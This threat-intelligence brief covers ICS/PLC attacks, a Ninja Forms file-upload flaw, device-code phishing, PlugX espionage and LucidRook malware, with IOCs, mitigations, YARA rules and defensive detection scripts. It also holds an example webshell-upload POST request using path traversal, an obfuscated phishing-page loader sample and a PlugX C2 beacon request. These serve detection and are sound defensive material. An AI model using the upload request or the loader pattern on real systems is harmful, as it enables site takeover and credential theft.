EXECUTIVE SUMMARY
This article is to inform our partners and clients on the various happenings within the cybersecurity space. That includes items such as relevant breaches, emerging vulnerabilities, research, threat actor movement, and what you need to do as an organization to mitigate a future threat.
KEY TAKEAWAYS
SUMMARY
Iranian-linked hackers are targeting internet-exposed Rockwell/Allen-Bradley PLCs in U.S. critical infrastructure networks in destructive and retaliatory attacks.
Category
Threat Actor Activities
Industry
Energy, Water, Manufacturing, Logistics, Agriculture and Food
Sources
https://www.ic3.gov/CSA/2026/260407.pdf
https://www.rockwellautomation.com/en-fi/trust-center/security-advisories/advisory.PN1550.html
https://www.cisa.gov/news-events/ics-advisories/icsa-21-056-03
https://github.com/sankarlmao/ICS-Temp_Project-
Internal OSec Collection
ANALYST COMMENTS
Iranian-linked hackers have targeted Internet-exposed Rockwell/Allen-Bradley PLCs in U.S. critical infrastructure networks since March 2026, resulting in financial losses and operational disruption, according to a joint advisory from multiple U.S. agencies. The attacks involve malicious interaction with project files and manipulation of data displayed on HMI and SCADA systems. The attacks are likely linked to escalating tensions between Iran, the United States, and Israel. The network indicators associated with this activity are listed below. The Ultahost IPs are associated with the threat actor from January 2025 to March 2026, with the Romania-based IP being the most recent.
IP address | Country | ASN | AS name | Organization
135.136.1[.]133 | Romania | AS9009 | M247 Europe SRL | M247 Europe SRL
185.82.73[.]164 | The Netherlands | AS214036 | Ultahost, Inc. | Ultahost, Inc
185.82.73[.]171 | The Netherlands | AS214036 | Ultahost, Inc. | Ultahost, Inc
185.82.73[.]162 | The Netherlands | AS214036 | Ultahost, Inc. | Ultahost, Inc
185.82.73[.]165 | The Netherlands | AS214036 | Ultahost, Inc. | Ultahost, Inc
185.82.73[.]167 | The Netherlands | AS214036 | Ultahost, Inc. | Ultahost, Inc
185.82.73[.]168 | The Netherlands | AS214036 | Ultahost, Inc. | Ultahost, Inc
185.82.73[.]170 | The Netherlands | AS214036 | Ultahost, Inc. | Ultahost, Inc
The hackers are scanning networks for exposed HMI and OT-related ports and using a combination of identity-centric attacks such as default passwords, password spraying, brute-forcing, and exploitation of known vulnerabilities in outdated devices. They are also attempting to exploit CVE-2021-22681, an authentication bypass vulnerability affecting Rockwell Logix Controllers. While some recent GitHub references suggest a possible SQL injection component, this has not yet been verified and there is no public PoC currently available. Data from internet-wide scanning platforms indicates significant exposure, with FOFA reporting more than 44,000 United States-based hosts with port 44818 publicly accessible. This port is a primary attack vector associated with this vulnerability.
Additionally, a similar advisory highlighted that between November 2023 and January 2024, CyberAv3ngers (a hacktivist persona for an IRGC-linked nation-state actor) compromised at least 75 Unitronics PLC devices, with half of these attacks targeting Water and Wastewater Systems (WWS) networks. Outside of specific Iranian threat actors, hacktivist groups, including those aligned with pro-Russian and pro-Palestinian causes, are increasingly targeting exposed OT environments by scanning for and exploiting publicly accessible HMI, Telnet, and other related service ports. Many of these groups are currently acting in coordination with Iranian hacktivists or related personas. The impact of this activity is likely to reach any sector with heavy industrial automation and is unlikely to be limited to the water and energy sectors. Manufacturing, logistics, and agriculture organizations that rely heavily on automation are at high risk if OT assets are exposed and remotely reachable over the public internet.
ACTIONABLE GUIDANCE
OT and IoT technologies such as PLCs and SCADA systems, along with remote access services such as Telnet and HMI ports, should be restricted and not exposed to the public internet. Reducing the exposure of these devices to the public internet significantly reduces the attack surface and limits the potential impact of an attack. Port 44818 should be blocked from remote connections to reduce the risk of exploitation of CVE-2021-22681 until a patch is applied or the system is upgraded to a supported version. Air-gapping should be used to separate corporate resources from automation networks in order to minimize the attack surface for these devices. Logs should be reviewed for suspicious activity, particularly on ports 44818, 2222, 102, and 502. Indicators of compromise may also include the installation of Dropbear SSH on affected devices.
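As an added example (not part of this brief or of the agencies' advisory), the following Python script applies the guidance above to flow records from a firewall or NetFlow collector: it flags any connection whose source is one of the IOC addresses listed in the analyst comments, and any connection to one of the named OT ports (44818, 2222, 102, 502) that does not originate from an allowlisted engineering subnet. The flow-record layout, the 10.20.0.0/16 allowlist and the sample flows are constructed assumptions; the IOC addresses are the ones listed above, refanged.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

# Network indicators listed in the brief, refanged for matching.
IOC_IPS = {
    "135.136.1.133",
    "185.82.73.164", "185.82.73.171", "185.82.73.162", "185.82.73.165",
    "185.82.73.167", "185.82.73.168", "185.82.73.170",
}

# OT service ports the guidance says to watch; labels are the usual protocol names.
OT_PORTS = {
    44818: "EtherNet/IP (CIP explicit messaging)",
    2222: "EtherNet/IP (CIP implicit I/O)",
    102: "S7comm / ISO-TSAP",
    502: "Modbus/TCP",
}

# Assumption: only this engineering subnet is permitted to reach the automation network.
ALLOWED_SOURCES = [ipaddress.ip_network("10.20.0.0/16")]


@dataclass
class Finding:
    line_no: int
    src: str
    dst: str
    dport: int
    reason: str


def parse_flow(line: str) -> Optional[tuple]:
    """Parse one constructed flow record: '<ts> <src> <sport> <dst> <dport> <proto>'."""
    parts = line.split()
    if len(parts) != 6:
        return None
    ts, src, sport, dst, dport, proto = parts
    try:
        ipaddress.ip_address(src)
        ipaddress.ip_address(dst)
        return ts, src, dst, int(dport), proto
    except ValueError:
        return None


def source_is_allowed(src: str) -> bool:
    """True when the source sits in an allowlisted engineering subnet."""
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in ALLOWED_SOURCES)


def analyze_flows(lines: List[str]) -> List[Finding]:
    """One Finding per matched indicator; a single flow can trigger more than one."""
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse_flow(line)
        if rec is None:
            continue
        _, src, dst, dport, _ = rec
        if src in IOC_IPS:
            findings.append(Finding(n, src, dst, dport, "source matches advisory IOC list"))
        if dport in OT_PORTS and not source_is_allowed(src):
            findings.append(Finding(n, src, dst, dport,
                                    f"{OT_PORTS[dport]} reached from non-allowlisted source"))
    return findings


# Constructed sample flows (documentation IP ranges), not real traffic.
SAMPLE_FLOWS = [
    "2026-04-07T02:14:11Z 185.82.73.164 51234 192.0.2.10 44818 tcp",
    "2026-04-07T02:15:40Z 203.0.113.5 40022 192.0.2.10 502 tcp",
    "2026-04-07T03:01:02Z 10.20.1.5 50500 192.0.2.10 44818 tcp",
    "2026-04-07T03:05:09Z 10.20.1.5 50501 192.0.2.20 443 tcp",
    "malformed line",
]

if __name__ == "__main__":
    for f in analyze_flows(SAMPLE_FLOWS):
        print(f"line {f.line_no}: {f.src} -> {f.dst}:{f.dport}  {f.reason}")
```

Any hit on the second rule is, by itself, evidence that an OT service is reachable from outside the engineering network, which is the exposure the guidance asks you to remove regardless of whether the source is a known indicator.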
SUMMARY
A critical vulnerability, CVE-2026-0740, in the File Uploads addon for the Ninja Forms WordPress plugin allows unauthenticated attackers to upload malicious PHP files.
Category
Critical Vulnerabilities
Industry
Multiple
Sources
ANALYST COMMENTS
A critical-severity vulnerability (CVE-2026-0740 with a CVSS score of 9.8) in the File Uploads addon for the Ninja Forms WordPress plugin allows unauthenticated attackers to upload arbitrary files due to insufficient file type validation, affecting approximately 50,000 websites. The issue stems from the function responsible for saving uploaded files to the uploads folder without proper destination filename verification. This enables path traversal and remote code execution via PHP files placed in the webroot directory. Successful exploitation can lead to complete site takeover through the deployment of web shells.
The vulnerability has public research available and is actively exploited by multiple attackers. Based on the research available, exploitation involves a crafted POST request using path traversal techniques in order to upload a malicious file or webshell onto a vulnerable server.
# Example POST request
POST /wp-admin/admin-ajax.php
Host: Example[.]com
action = nf-fu-upload
nonce = <string of alphanumerics>
form_id = 1
field_id = 5
files-5 File = webshell.php.jpg
webshell_php_jpg = ../../webshell.php
Exploitation of this vulnerability is likely opportunistic, with cybercriminal and hacktivist groups as the primary threat actors. Any WordPress site using this plugin may be affected, often identifiable by the presence of the plugin upload directory, typically located at:
/wp-content/uploads/ninja-forms/<form id number>/<filename>
ACTIONABLE GUIDANCE
Users are urged to upgrade to version 3.3.27 to remediate this issue. Reviewing logs for instances of “action = nf-fu-upload” can help identify potential malicious activity, along with repeated access to a specific file from the same source IP address within the NinjaForms upload folder. Files uploaded that have dual extensions such as .php.jpg are a strong indicator of suspicious activity and could indicate potential exploitation of this vulnerability. Proactive blocking of wp-admin endpoints from non-internal staff or IP addresses will further mitigate the likelihood of this vulnerability being taken advantage of.
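The following Python example is added here and is not code from the brief, from Ninja Forms or from OSec. It shows the two sides of the issue described above: a hardened destination check of the kind the analyst comments say the addon lacked (the client may choose only a leaf filename, directory components and server-side extensions anywhere in the name are refused, and the resolved path must stay under the uploads root), and a scan of access-log lines for the indicators named in the guidance (the nf-fu-upload action, dual-extension files under the Ninja Forms upload folder, and repeated access to one uploaded file from one source). The web-root prefix, the dangerous-extension list, the assumption that the access log records the action in the query string, and the sample log lines are constructed assumptions.

```python
import os
import re
from collections import Counter
from pathlib import Path
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# Upload root named in the brief; the absolute prefix is an assumption about the web root.
UPLOADS_ROOT = Path("/var/www/html/wp-content/uploads/ninja-forms")

# Extensions that must never be written to a web-served folder (assumption; extend as needed).
DANGEROUS_EXTS = {"php", "phtml", "php5", "phar"}

# Combined-log prefix: client, ident, user, [time], "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')


def has_dangerous_extension(filename: str) -> bool:
    """True for a server-side extension anywhere in the name, e.g. shell.php or shell.php.jpg."""
    parts = filename.lower().split(".")
    return len(parts) > 1 and any(p in DANGEROUS_EXTS for p in parts[1:])


def resolve_upload_destination(root: Path, form_id: str, filename: str) -> Optional[Path]:
    """Hardened destination check; returns the writable path or None when the request must be refused."""
    if not form_id.isdigit():
        return None
    # The client controls only the leaf name: any directory component is rejected outright.
    leaf = os.path.basename(filename.replace("\\", "/"))
    if leaf != filename or leaf in ("", ".", ".."):
        return None
    if has_dangerous_extension(leaf):
        return None
    target = (root / form_id / leaf).resolve()
    # Belt and braces: the resolved path must still sit under the uploads root.
    if root.resolve() not in target.parents:
        return None
    return target


def scan_access_log(lines: List[str], repeat_threshold: int = 3) -> Dict[str, list]:
    """Apply the brief's log indicators to web-server access-log lines."""
    upload_calls, suspicious_files = [], []
    hits: Counter = Counter()
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, target = m.group(1), m.group(2), m.group(3)
        path, _, query = target.partition("?")
        if path.endswith("/wp-admin/admin-ajax.php") and "nf-fu-upload" in parse_qs(query).get("action", []):
            upload_calls.append((n, ip, method))
        if path.startswith("/wp-content/uploads/ninja-forms/"):
            hits[(ip, path)] += 1
            if has_dangerous_extension(path.rsplit("/", 1)[-1]):
                suspicious_files.append((n, ip, path))
    repeated = sorted((key, c) for key, c in hits.items() if c >= repeat_threshold)
    return {"upload_calls": upload_calls, "suspicious_files": suspicious_files, "repeated_access": repeated}


# Constructed log lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Apr/2026:10:00:01 +0000] "POST /wp-admin/admin-ajax.php?action=nf-fu-upload HTTP/1.1" 200 512',
    '198.51.100.7 - - [08/Apr/2026:10:00:09 +0000] "GET /wp-content/uploads/ninja-forms/1/webshell.php.jpg HTTP/1.1" 200 88',
    '198.51.100.7 - - [08/Apr/2026:10:00:15 +0000] "GET /wp-content/uploads/ninja-forms/1/webshell.php.jpg HTTP/1.1" 200 88',
    '198.51.100.7 - - [08/Apr/2026:10:00:21 +0000] "GET /wp-content/uploads/ninja-forms/1/webshell.php.jpg HTTP/1.1" 200 88',
    '203.0.113.9 - - [08/Apr/2026:10:02:00 +0000] "GET /wp-content/uploads/ninja-forms/1/report.pdf HTTP/1.1" 200 9000',
    '203.0.113.9 - - [08/Apr/2026:10:02:05 +0000] "GET /index.php HTTP/1.1" 200 1',
]

if __name__ == "__main__":
    for name in ("report.pdf", "webshell.php.jpg", "../../webshell.php"):
        print(name, "->", resolve_upload_destination(UPLOADS_ROOT, "1", name))
    print(scan_access_log(SAMPLE_LOG))
```

The extension check deliberately looks at every dotted segment, not only the last one, because a file named webshell.php.jpg is the dual-extension indicator the guidance calls out and is executable under some handler configurations.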
SUMMARY
A sophisticated AI-driven phishing campaign called “EvilTokens” has been compromising hundreds of organizations daily by exploiting device-code authentication methods to bypass MFA and steal financial data from corporate email accounts.
Category
Phishing
Industry
Financial and Fintech
Sources
https://www.theregister.com/2026/04/07/microsoft_device_code_phishing/
https://blog.sekoia.io/new-widespread-eviltokens-kit-device-code-phishing-as-a-service-part-1/
Internal OSec Collection
ANALYST COMMENTS
A sophisticated phishing campaign has targeted hundreds of organizations daily since March 15, 2026, leveraging AI and automation to bypass MFA through Microsoft device-code authentication and steal financial data. The attackers use highly personalized phishing emails with dynamic redirects to legitimate domains, leading victims to enter a device code on the microsoft.com/devicelogin page, which attackers monitor to gain access once entered. Once compromised, attackers focus on exfiltrating finance-related email content and may establish persistence by generating Primary Refresh Tokens (PRT).
The campaign is primarily fueled by financially motivated affiliates of the EvilTokens Phishing-as-a-Service (PhaaS) platform. While the current campaign primarily targets the financial sector, its availability as an affiliate service means it could be adopted by other threat actors, including those pursuing espionage or large-scale initial access. The lures and phishing templates currently used by the service include the following:
The phishing pages all have similar code on the provided lure pages which may help identify this campaign being used. The below is one such sample:
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
</head>
<body>
<div id="r">
</div>
<script>
async function d(){
try{
async function d(){
try {
var a='<AES_ENCRYPTED_PAYLOAD>', b='<AES_IV>', c='<AES_KEY>';
function f(s){
return Uint8Array.from(atob(s), x => x.charCodeAt(0));
}
var k = await crypto.subtle.importKey('raw', f(c), 'AES-GCM', false, ['decrypt']);
var p = await crypto.subtle.decrypt({ name: "AES-GCM", iv: f(b) }, k, f(a));
document.open();
document.write(new TextDecoder().decode(p));
document.close();
} catch(e) {
document.body.innerHTML = 'Loading failed';
}
}
d();
} catch(e) {}
}
d();
</script>
</body>
</html>
In addition to the heavy use of URLs following the domain structure noted below, samples consistently include the X-Antibot-Token header in requests:
# Domain structure of phishing pages
*s-account.workers.dev
# Antibot token header seen during requests and interaction by victim user
X-Antibot-Token: <token string>
In our research, variations in requests and landing pages suggest the use of AI/LLM code generation tools to dynamically generate phishing pages. The X-Antibot-Token header appears in requests to api/device/start, and the samples follow naming conventions that use the workers[.]dev domain regardless of changes to the HTML/JavaScript code itself.
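As an added example (not from the brief, from Sekoia or from OSec), the Python script below turns the three observations above into a correlation over web-proxy records: a visit to a host matching the *s-account.workers.dev convention, a request to api/device/start carrying an X-Antibot-Token header, and, for the same client shortly afterwards, a visit to the Microsoft device-login page where the victim enters the code. The proxy record layout, the 15-minute window, the set of device-login hostnames and the sample records are constructed assumptions.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Hostname convention from the brief: <something>s-account.workers.dev
LURE_HOST_RE = re.compile(r"^[a-z0-9-]*s-account\.workers\.dev$", re.I)
KIT_API_PATH = "api/device/start"
# Where the victim enters the code (microsoft.com/devicelogin and the host it redirects to; assumption).
DEVICE_LOGIN_HOSTS = {"microsoft.com", "www.microsoft.com", "login.microsoftonline.com"}
# Assumption: a lure visit followed by a device-login visit inside this window is one phishing session.
SEQUENCE_WINDOW = timedelta(minutes=15)


def parse_ts(value: str) -> datetime:
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def is_device_login(host: str, uri: str) -> bool:
    u = uri.lower()
    return host.lower() in DEVICE_LOGIN_HOSTS and ("devicelogin" in u or "deviceauth" in u)


def correlate(events: List[Dict]) -> List[Tuple[str, str, str]]:
    """Return (client, finding, host) triples from proxy records with ts/client/host/uri/headers."""
    findings = []
    last_lure: Dict[str, datetime] = {}
    for ev in sorted(events, key=lambda e: parse_ts(e["ts"])):
        ts, client = parse_ts(ev["ts"]), ev["client"]
        host, uri = ev["host"].lower(), ev.get("uri", "/")
        headers = {k.lower(): v for k, v in ev.get("headers", {}).items()}
        if LURE_HOST_RE.match(host):
            findings.append((client, "lure_page", host))
            last_lure[client] = ts
            if KIT_API_PATH in uri and "x-antibot-token" in headers:
                findings.append((client, "kit_api_call", host))
        elif is_device_login(host, uri):
            lure_ts = last_lure.get(client)
            if lure_ts is not None and ts - lure_ts <= SEQUENCE_WINDOW:
                findings.append((client, "device_code_sequence", host))
    return findings


# Constructed proxy records (documentation IP ranges); not real traffic.
SAMPLE_EVENTS = [
    {"ts": "2026-04-08T10:00:00Z", "client": "198.51.100.20",
     "host": "contoso-s-account.workers.dev", "uri": "/"},
    {"ts": "2026-04-08T10:00:05Z", "client": "198.51.100.20",
     "host": "contoso-s-account.workers.dev", "uri": "/api/device/start",
     "headers": {"X-Antibot-Token": "constructed-token-value"}},
    {"ts": "2026-04-08T10:01:30Z", "client": "198.51.100.20",
     "host": "microsoft.com", "uri": "/devicelogin"},
    {"ts": "2026-04-08T09:30:00Z", "client": "198.51.100.21",
     "host": "microsoft.com", "uri": "/devicelogin"},
    {"ts": "2026-04-08T10:05:00Z", "client": "198.51.100.22",
     "host": "example.workers.dev", "uri": "/"},
]

if __name__ == "__main__":
    for client, kind, host in correlate(SAMPLE_EVENTS):
        print(client, kind, host)
```

A lone visit to the device-login page is normal for users who legitimately sign in from TVs or CLI tools, so the script only raises device_code_sequence when the same client touched a lure host first; the lure_page and kit_api_call findings stand on their own.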
ACTIONABLE GUIDANCE
Device code authentication should be restricted or disabled to reduce the attack surface for this activity. User awareness training should also be conducted to help identify and report suspicious emails, particularly those using lures related to the following:
The threat actor sent mail from [EXTERNAL] senders and redirected users to Cloudflare hosted sites that mimic major technology, SSO, and document processing vendors. The URLs do not match the brands displayed back to the user. YARA rules are available for this phishing campaign based on common string matching:
# Rule for matching against commonly known eviltokens related phishing pages
rule eviltokens_phishing {
    strings:
        $html = "<!DOCTYPE html>" ascii
        $str01 = "<div id=\"r\">" ascii
        $str02 = "function f(s){" ascii
        $str03 = "return Uint8Array.from(atob(s),x=>x.charCodeAt(0))" ascii
        $str04 = "var k=await crypto.subtle.importKey(" ascii
        $str05 = "var p=await crypto.subtle.decrypt(" ascii
        $str06 = "name:\"AES-GCM\",iv:f(b)" ascii
        $str07 = "document.write(new TextDecoder().decode(" ascii
        $str08 = "document.body.innerHTML=\"Loading failed\"" ascii
        $str09 = "document.close()}catch(e)" ascii
    condition:
        $html at 0 and
        6 of them and filesize < 50KB
}
# Rule for detecting on antibot token and post request to api/device/start
rule Detect_Antibot_Device_Start
{
    meta:
        description = "Detects X-Antibot-Token header and POST request to api/device/start (flexible match)"
        date = "2026-04-09"
        version = "1.1"
    strings:
        $header = "X-Antibot-Token" nocase
        $post_regex = /POST\s+\/?api\/device\/start/ nocase
    condition:
        $header and $post_regex
}
SUMMARY
TA416, a Chinese state-backed cyber espionage group also known as Mustang Panda, has intensified its activities in Europe and the Middle East since mid-2025. It uses sophisticated malware delivery techniques including web bugs, Cloudflare Turnstile challenges, OAuth redirects, and custom PlugX payloads to target diplomatic and government entities.
Category
State-Sponsored Espionage
Industry
Public Sector and Government Administration
Sources
https://www.infosecurity-magazine.com/news/china-hackers-ta416-europe/
ANALYST COMMENTS
TA416, a Chinese state-backed cyber espionage group also known as Mustang Panda, resumed its activities in mid-2025 with campaigns targeting European diplomatic missions. The group uses techniques including Cloudflare Turnstile challenges, OAuth redirects, and C# project files to deploy custom PlugX payloads. In March 2026, the group expanded its targets to include Middle Eastern entities following conflicts in Iran. The campaigns include both web bug reconnaissance and sophisticated malware delivery methods such as ZIP smuggling and CSPROJ-based downloaders to ultimately load PlugX into memory. TA416 frequently changes its initial infection methods while maintaining a consistent objective of deploying PlugX, often using re-registered domains and Cloudflare services to evade detection.
The current campaign is an example of state-backed threat actors taking advantage of the conflict in Iran and targeting organizations located within the Middle East. Initial access is primarily achieved through phishing lures that lead to PlugX infections once the attack chain completes. European, particularly diplomatic, entities are at the highest risk from this campaign. Initial emails use several lures including:
The threat actors use a combination of gmail.com addresses, in addition to likely stolen government email accounts, including domains such as *.gov[.]sy, during the initial access and social-engineering phase of the campaign. Based on a recent sample, the malware loading method may change over time. However, analysis shows it establishes persistence within the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key, which points to an executable that runs on user login. Recent samples also made use of the .chm (Windows Compiled HTML Help) file format for PlugX delivery and wrote files to C:\ProgramData\BaiNetDisk and C:\Users\<user>\Appdata\Local\Temp\Rar$DIa<numerical decimal string>\*.chm. These samples also made use of Timeout.exe to delay execution in order to evade security controls. Network indicators should not be relied upon alone for indications of compromise. The threat actor uses legitimate or compromised domains, making detection more difficult without supporting signals or suspicious traffic. Communication with the C&C infrastructure uses XOR and RC4 in requests sent over HTTP. The below is a sample request made to a C&C server:
GET /99Ejvj7Qu967uRoD=g0PgPW68&Zc=j1GTl8RZ&os=r5moW7b38dIydHGRnX=R6voRdMpJYZL2D9=4WLzJxafCl4QEV3T8AKmztRVHPbYeEfeNn6GF7AEZQeY1Fgg10LMw6by5f94zgUt HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
Pragma: no-cache
Accept: */*
Cookie: Ro=3g0PgPW68xZccj1GTl8RZ;token=2592D9CE333F30B6ossr5moW7b38dIydHGRnXvR6voRdMpJYZL2D9=9Ejvj7Qu4WLzJxafCl4QEV3T8AKmztRVHPbYeEfeNn6GF7AEZQeY1Fgg10LMw6by5f94zgUt2oaxxFPWQAVIfIXkNFS12sno6hTTPeTRJ2b87rSYqmN2ZZ;TmwyV4An=1N15SlSA9at0WshuFnv1HPnm7Ju9jrzlNK83A46XrnZFsBbKEMbJa;y=wTUCOJS;
User-Agent: M
Host: ombut.com
Researchers have also observed that the threat actor seems to favor particular VPS providers including: Evoxt Enterprise (AS149440), XNNET LLC (AS6134) and Kaopu Cloud HK Limited (AS138915). This can be used as a supporting signal when investigating potential compromise alongside other indicators from this infection chain.
ACTIONABLE GUIDANCE
Government and public sector organizations, as well as contractors supporting these environments, are at elevated risk, particularly those operating in Europe and the Middle East. Organizations in the UAE and surrounding regions may face more immediate risk as geopolitical tensions related to the Iran conflict continue to drive targeting priorities. External emails from unknown persons or from unknown government email addresses should be regarded as suspicious, especially when pointing to a Microsoft OAuth linked page. These links may redirect users to sites that deliver archive files used to initiate the infection chain. The latest sample used .chm files, which are uncommon and suspicious. Archive files and installation binaries such as .msi should also be treated as high risk when delivered through unsolicited external communications. Across recent samples analyzed this year, all showed registry changes to HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pointing to an executable file, along with file and folder creation consistent with the patterns noted above. Monitoring for changes in these locations may give insight into possible exploitation, especially when the victim has received suspicious emails from unknown parties. Regular network communication to hosts within the IPv4 ranges of Evoxt Enterprise (AS149440), XNNET LLC (AS6134) and Kaopu Cloud HK Limited (AS138915), when combined with other signals, may indicate compromise.
SUMMARY
Hackers are targeting Taiwanese NGOs and universities with the LucidRook malware, delivered through deceptive security tools and spear-phishing emails.
Category
Threat Actor Activities
Industry
Education, Non-profits, Technology
*Note: Primarily affecting organizations located in and around Taiwan, with a suspected relation to targets in the semiconductor industry.
Sources
https://gbhackers.com/lucidrook-in-taiwan-cyberattacks/amp/
https://blog.talosintelligence.com/new-lua-based-malware-lucidrook/
https://www.taipeitimes.com/News/taiwan/archives/2026/03/22/2003854262
https://intactbase.csu.edu.tw/AboutSC
ANALYST COMMENTS
Hackers are using sophisticated spear-phishing techniques to deploy the LucidRook malware against NGOs and universities in Taiwan by disguising it as security tools or cleanup utilities. The operation, identified as UAT-10362, uses two multi-stage infection chains. One involves a malicious LNK file that mimics legitimate system activity through PowerShell and DISM binaries to sideload the LucidPawn dropper and install LucidRook. The second uses a .NET executable, with some examples posing as Trend Micro software or likely other security software. LucidRook is a DLL with an embedded Lua interpreter for executing obfuscated payloads, gathering host data, and exfiltrating it via FTP. It also communicates through Chinese OAST services for network reachability checks.
Network indicators show no overlap with other known activity, suggesting a targeted campaign rather than opportunistic attacks. Observed infrastructure includes Taiwan based IP addresses and one domain linked to Digital Ocean ASN AS14061 in Singapore. The DNS hostname d.2fcc7078.digimg[.]store links to dnslog[.]ink, a Chinese OAST provider. The following IP addresses are used as C2 servers, leveraging compromised or abused FTP services to transfer encrypted payloads named archive<number>.zip:
1.34.253[.]131:21 - 3462 Data Communication Business Group - ProFTPD
59.124.71[.]242:21 - 3462 Data Communication Business Group - Unknown but also likely ProFTPD
The C2 servers were still active and up as of April 10th, 2026, indicating exploitation is likely still ongoing.
Reconnaissance data is also being sent through Gmail communications, consistent with behavior observed in the threat actor’s attack chain. The following email addresses have been used:
fexopuboriw972@gmail[.]com
crimsonanabel@powerscrews[.]com - Temporary mail address
We analyzed available samples to identify persistence mechanisms and potential disruption points. The malware uses dismcore.dll as its primary side-loading target, typically placed in directories such as C:\ProgramData. Samples show the use of .lnk files placed in the Windows start-up folder for persistence, including files such as Edge.exe.lnk. The malware stages executables and DLLs in C:\ProgramData, including malicious dismcore.dll and msedge.exe files. Additional activity includes .lnk files dropped in user temp directories and hidden archive paths such as .Trashes that deploy malicious files during execution, often disguised as PDF or other document types to evade detection.
The intrusion shows characteristics of a highly targeted campaign with evolving tactics. The current targets include NGOs and universities, particularly those involved with semiconductor production and research. The activity may align with regional developments, including Taiwan expanding semiconductor partnerships such as the INTENSE program, alongside export growth and increased pressure from China through rare earth restrictions, which coincided with a rise in targeting of the semiconductor sector.
ACTIONABLE GUIDANCE
This campaign primarily uses phishing emails to deliver .rar archive files through shortened links. The email lures are authoritative in nature, mimicking official government announcements, memos, or forms; the decoy documents are in fact renamed .lnk files that execute the attack chain. While some aspects of the campaign vary, common patterns include C2 traffic to IP addresses hosting FTP servers and data exfiltration through Gmail to temporary accounts. Monitoring for unknown traffic to port 21, and monitoring for file-system changes, especially within the C:\ProgramData folders and Windows user start-up folders, will aid in detecting this attack during its initial staging activities. The dismcore.dll file is normally found in the C:\Windows\System32\Dism and C:\Windows\SysWow64\Dism folders. Any other location in which the file is found should be regarded as suspicious. Restricting PowerShell use to administrators only will also help mitigate a variant of this malware and reduce the risk of execution.
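The host-based indicators in this LucidRook section and in the TA416 section above are the same kind of signal (a Run-key value or a file created in a location it does not belong), so one added example serves both. The Python script below, which is not code from the brief, from Talos or from OSec, evaluates Sysmon-style registry and file-creation events against those indicators: HKCU Run values pointing into user-writable locations, files staged under C:\ProgramData\BaiNetDisk, .chm files extracted to Temp\Rar$DIa*, dismcore.dll anywhere other than the two Dism folders named above, .lnk files in the user Startup folder, and msedge.exe under C:\ProgramData. The event layout and the sample events are constructed assumptions; the paths and key are the ones the brief lists.

```python
import re
from typing import Dict, List, Tuple

# Persistence key named in both sections; the "HKCU" short form is accepted as well.
RUN_KEY_RE = re.compile(
    r"^(?:hkcu|hkey_current_user)\\software\\microsoft\\windows\\currentversion\\run$", re.I)
# Locations a standard user can write to; a Run value pointing here is the suspicious case.
USER_WRITABLE_RE = re.compile(r"^c:\\(?:programdata|users\\[^\\]+\\appdata)\\", re.I)
# The only places the brief lists as legitimate homes for dismcore.dll.
DISM_LEGIT_RE = re.compile(r"^c:\\windows\\(?:system32|syswow64)\\dism\\dismcore\.dll$", re.I)

# (regex over the created file path, description) pairs drawn from the two sections.
FILE_RULES: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"^c:\\programdata\\bainetdisk\\", re.I),
     "TA416: file staged under C:\\ProgramData\\BaiNetDisk"),
    (re.compile(r"\\appdata\\local\\temp\\rar\$dia[^\\]*\\[^\\]+\.chm$", re.I),
     "TA416: .chm extracted to Temp\\Rar$DIa*"),
    (re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", re.I),
     "LucidRook: .lnk dropped in the user Startup folder"),
    (re.compile(r"^c:\\programdata\\(?:[^\\]+\\)*msedge\.exe$", re.I),
     "LucidRook: msedge.exe staged under C:\\ProgramData"),
]


def image_from_run_value(data: str) -> str:
    """Pull the executable path out of a Run value, quoted ("C:\\a b\\x.exe" /arg) or bare (C:\\x.exe /arg)."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:data.find('"', 1)]
    return data.split(" ", 1)[0]


def evaluate(events: List[Dict]) -> List[Tuple[int, str]]:
    """Return (event index, description) for every event matching an indicator."""
    findings = []
    for i, ev in enumerate(events):
        if ev["type"] == "registry_set":
            if RUN_KEY_RE.match(ev["key"]) and USER_WRITABLE_RE.match(image_from_run_value(ev["data"])):
                findings.append((i, f"Run-key persistence '{ev['value_name']}' -> user-writable path"))
        elif ev["type"] == "file_create":
            path = ev["path"]
            for rx, desc in FILE_RULES:
                if rx.search(path):
                    findings.append((i, desc))
            if path.lower().endswith("\\dismcore.dll") and not DISM_LEGIT_RE.match(path):
                findings.append((i, "LucidRook: dismcore.dll outside the Dism folders (side-loading target)"))
    return findings


# Constructed Sysmon-style events for illustration; none are from a real host.
SAMPLE_EVENTS = [
    {"type": "registry_set", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "BaiNetDisk", "data": r'"C:\ProgramData\BaiNetDisk\update.exe"'},
    {"type": "file_create", "path": r"C:\ProgramData\BaiNetDisk\update.exe"},
    {"type": "file_create", "path": r"C:\Users\alice\AppData\Local\Temp\Rar$DIa1234.5678\notice.chm"},
    {"type": "file_create", "path": r"C:\ProgramData\dismcore.dll"},
    {"type": "file_create", "path": r"C:\Windows\System32\Dism\dismcore.dll"},
    {"type": "file_create",
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Edge.exe.lnk"},
    {"type": "registry_set", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "OneDrive", "data": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'},
]

if __name__ == "__main__":
    for idx, desc in evaluate(SAMPLE_EVENTS):
        print(idx, desc)
```

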